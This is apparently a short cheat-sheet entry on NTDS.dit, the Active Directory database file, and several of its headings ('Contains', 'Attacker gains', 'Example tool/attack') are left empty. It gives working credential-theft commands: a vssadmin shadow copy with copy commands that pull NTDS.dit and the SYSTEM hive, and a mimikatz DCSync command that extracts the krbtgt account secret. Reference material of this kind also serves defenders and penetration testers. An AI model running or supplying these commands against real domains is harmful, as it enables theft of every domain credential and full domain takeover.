1- NTDS.dit (AD Database)

What it is:

The core Active Directory database file on a Domain Controller.

Location:

C:\\Windows\\NTDS\\NTDS.dit (plus associated EDB log files).

Contains:

Attacker gains:

Extraction methods:

  1. Volume Shadow Copy + file copy

    vssadmin create shadow /for=C:
    copy \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopyX\\\\Windows\\\\NTDS\\\\NTDS.dit C:\\temp\\
    copy \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopyX\\\\Windows\\\\System32\\\\Config\\\\SYSTEM C:\\temp\\
    
  2. DCSync (remote)

    mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
    

Example tool/attack: